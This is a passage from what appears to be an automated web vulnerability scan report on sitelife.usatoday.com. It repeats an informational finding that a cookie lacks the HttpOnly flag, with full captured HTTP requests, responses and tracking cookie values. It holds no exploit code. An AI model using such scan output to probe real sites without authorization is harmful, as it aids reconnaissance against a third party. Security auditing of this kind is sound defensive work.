The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/comments/pluck-comm-reply-arrow-hide.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|J06575_10245|J06575_10396|D08734_72078; usatprod=R1449692072; SiteLifeHost=gnvm3l3pluckcom
If-None-Match: "48ae54f3917acb1:2af"
If-Modified-Since: Tue, 02 Nov 2010 13:29:18 GMT

Response

HTTP/1.1 304 Not Modified
Set-Cookie: usatprod=R1449692072; path=/
Date: Mon, 09 May 2011 15:38:16 GMT
Etag: "48ae54f3917acb1:2af"
Connection: close


11.62. http://sitelife.usatoday.com/ver1.0/Content/ua/images/comments/pluck-comm-reply-arrow-show.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/comments/pluck-comm-reply-arrow-show.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/comments/pluck-comm-reply-arrow-show.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|J06575_10245|J06575_10396|D08734_72078; usatprod=R1449692072; SiteLifeHost=gnvm3l3pluckcom
If-None-Match: "a21057f3917acb1:2af"
If-Modified-Since: Tue, 02 Nov 2010 13:29:18 GMT

Response

HTTP/1.1 304 Not Modified
Set-Cookie: usatprod=R1449692072; path=/
Date: Mon, 09 May 2011 15:38:16 GMT
Etag: "a21057f3917acb1:2af"
Connection: close


11.63. http://sitelife.usatoday.com/ver1.0/Content/ua/images/comments/pluck-comm-rss-button.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/comments/pluck-comm-rss-button.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/comments/pluck-comm-rss-button.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|J06575_10245|J06575_10396|D08734_72078; usatprod=R1449692072; SiteLifeHost=gnvm3l3pluckcom
If-None-Match: "48ae54f3917acb1:2af"
If-Modified-Since: Tue, 02 Nov 2010 13:29:18 GMT

Response

HTTP/1.1 304 Not Modified
Set-Cookie: usatprod=R1449692072; path=/
Date: Mon, 09 May 2011 15:38:15 GMT
Etag: "48ae54f3917acb1:2af"
Connection: close


11.64. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-avatar-blocked.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/pluck-avatar-blocked.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/pluck-avatar-blocked.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|J06575_10245|J06575_10396|D08734_72078; usatprod=R1449692072; SiteLifeHost=gnvm3l3pluckcom
If-None-Match: "39786e5b4b7fcb1:2af"
If-Modified-Since: Mon, 08 Nov 2010 13:46:34 GMT

Response

HTTP/1.1 304 Not Modified
Set-Cookie: usatprod=R1449692072; path=/
Date: Mon, 09 May 2011 15:38:14 GMT
Etag: "39786e5b4b7fcb1:2af"
Connection: close


11.65. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-avatar-default.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/pluck-avatar-default.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/pluck-avatar-default.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449692072; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|D08734_72078

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449692072; path=/
Content-Length: 624
Content-Type: image/gif
Last-Modified: Mon, 08 Nov 2010 13:46:35 GMT
Accept-Ranges: bytes
ETag: "5fac45c4b7fcb1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:36:55 GMT
Connection: close

GIF89a(.(...............................................................................................................................................................................................
...[SNIP]...

11.66. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-pagination-bg-2.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/pluck-pagination-bg-2.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/pluck-pagination-bg-2.jpg HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|D08734_72078; usatprod=R1449692072

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449692072; path=/
Content-Length: 643
Content-Type: image/jpeg
Last-Modified: Tue, 02 Nov 2010 13:29:20 GMT
Accept-Ranges: bytes
ETag: "209dc8f4917acb1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:36:59 GMT
Connection: close

......JFIF.....d.d......Ducky.......<.....&Adobe.d...........
...........Q...................    ...    .......

.

.......................................................................................
...[SNIP]...

11.67. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-pagination-bg.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/pluck-pagination-bg.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/pluck-pagination-bg.jpg HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449692072; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|D08734_72078

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449692072; path=/
Content-Length: 1448
Content-Type: image/jpeg
Last-Modified: Mon, 08 Nov 2010 16:08:58 GMT
Accept-Ranges: bytes
ETag: "9b793f405f7fcb1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:36:55 GMT
Connection: close

......JFIF.....d.d......Ducky.......<.....&Adobe.d...........
...r...3...V...................    ...    .......

.

.......................................................................................
...[SNIP]...

11.68. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-pagination-last-bg.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/pluck-pagination-last-bg.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/pluck-pagination-last-bg.png HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|D08734_72078; usatprod=R1449692072

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449692072; path=/
Content-Length: 537
Content-Type: image/png
Last-Modified: Tue, 02 Nov 2010 13:29:20 GMT
Accept-Ranges: bytes
ETag: "b813bff4917acb1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:37:00 GMT
Connection: close

.PNG
.
...IHDR.............".N'....tEXtSoftware.Adobe ImageReadyq.e<....IDATx....j.@...M...`.Z.5...............(..1.>......^.. .$*..$..D*XDS0RJ........lf....Z.f6...c8a>...x..t..j.j...D".x<.G.....V.
...[SNIP]...

11.69. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-pagination-next-bg.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/pluck-pagination-next-bg.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/pluck-pagination-next-bg.png HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|D08734_72078; usatprod=R1449692072

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449692072; path=/
Content-Length: 500
Content-Type: image/png
Last-Modified: Tue, 02 Nov 2010 13:29:20 GMT
Accept-Ranges: bytes
ETag: "6cd8c3f4917acb1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:37:00 GMT
Connection: close

.PNG
.
...IHDR...E.........g.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx....k.P....h..`p.P..:.T!.........k......+8;(...`...W.Ms.t)...........'..0.q.j..n...b.Q..F.....:c.f..N.H....B.BY........P.
...[SNIP]...

11.70. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-primary-button-left.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/pluck-primary-button-left.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/pluck-primary-button-left.png HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|D08734_72078; usatprod=R1449692072

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449692072; path=/
Content-Length: 638
Content-Type: image/png
Last-Modified: Tue, 02 Nov 2010 13:29:20 GMT
Accept-Ranges: bytes
ETag: "1276c1f4917acb1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:36:59 GMT
Connection: close

.PNG
.
...IHDR...,.................tEXtSoftware.Adobe ImageReadyq.e<... IDATx....k.A...g....$.)..A...X.....7.XY..cmsDm..!(.Q....5....+b.r....Yg..]1..O...,<.fv.../=..w.u.@.j.kw....E....XEQ$......    Y.
...[SNIP]...

11.71. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-primary-button-right.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/pluck-primary-button-right.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/pluck-primary-button-right.png HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|D08734_72078; usatprod=R1449692072

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449692072; path=/
Content-Length: 440
Content-Type: image/png
Last-Modified: Tue, 02 Nov 2010 13:29:20 GMT
Accept-Ranges: bytes
ETag: "209dc8f4917acb1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:36:59 GMT
Connection: close

.PNG
.
...IHDR..............L_.....tEXtSoftware.Adobe ImageReadyq.e<...ZIDATx.tQ.JBA.=3.7$...=(......hQH....h.......6.I.P[w."Zd..LA....z......:.....g....;...A*iq..)W...Z.l#}i..6..sX.....aN...i.ABa.
...[SNIP]...

11.72. http://sitelife.usatoday.com/ver1.0/Content/ua/images/reactions/abuse/pluck-abuse-report-icon.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/reactions/abuse/pluck-abuse-report-icon.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/reactions/abuse/pluck-abuse-report-icon.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|J06575_10245|J06575_10396|D08734_72078; usatprod=R1449692072; SiteLifeHost=gnvm3l3pluckcom
If-None-Match: "62f23bf4917acb1:2af"
If-Modified-Since: Tue, 02 Nov 2010 13:29:19 GMT

Response

HTTP/1.1 304 Not Modified
Set-Cookie: usatprod=R1449692072; path=/
Date: Mon, 09 May 2011 15:38:13 GMT
Etag: "62f23bf4917acb1:2af"
Connection: close


11.73. http://sitelife.usatoday.com/ver1.0/Content/ua/images/reactions/abuse/pluck-abuse-reported-icon.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/reactions/abuse/pluck-abuse-reported-icon.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/reactions/abuse/pluck-abuse-reported-icon.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|J06575_10245|J06575_10396|D08734_72078; usatprod=R1449692072; SiteLifeHost=gnvm3l3pluckcom
If-None-Match: "89039f4917acb1:2af"
If-Modified-Since: Tue, 02 Nov 2010 13:29:19 GMT

Response

HTTP/1.1 304 Not Modified
Set-Cookie: usatprod=R1449692072; path=/
Date: Mon, 09 May 2011 15:38:14 GMT
Etag: "89039f4917acb1:2af"
Connection: close


11.74. http://sitelife.usatoday.com/ver1.0/Content/ua/images/reactions/score/pluck-thumb-up-grayed.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/reactions/score/pluck-thumb-up-grayed.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/reactions/score/pluck-thumb-up-grayed.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|J06575_10245|J06575_10396|D08734_72078; usatprod=R1449692072; SiteLifeHost=gnvm3l3pluckcom
If-None-Match: "d8a24cf4917acb1:2af"
If-Modified-Since: Tue, 02 Nov 2010 13:29:19 GMT

Response

HTTP/1.1 304 Not Modified
Set-Cookie: usatprod=R1449692072; path=/
Date: Mon, 09 May 2011 15:38:13 GMT
Etag: "d8a24cf4917acb1:2af"
Connection: close


11.75. http://sitelife.usatoday.com/ver1.0/Content/ua/images/throbber.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/throbber.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/throbber.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|J06575_10245|J06575_10396|D08734_72078; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449692072
If-None-Match: "8687ae56b7ccb1:2af"
If-Modified-Since: Thu, 04 Nov 2010 22:01:56 GMT

Response

HTTP/1.1 304 Not Modified
Set-Cookie: usatprod=R1449692072; path=/
Date: Mon, 09 May 2011 15:38:11 GMT
Etag: "8687ae56b7ccb1:2af"
Connection: close


11.76. http://sitelife.usatoday.com/ver1.0/Content/ua/images/throbber_circle.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/ua/images/throbber_circle.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/throbber_circle.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
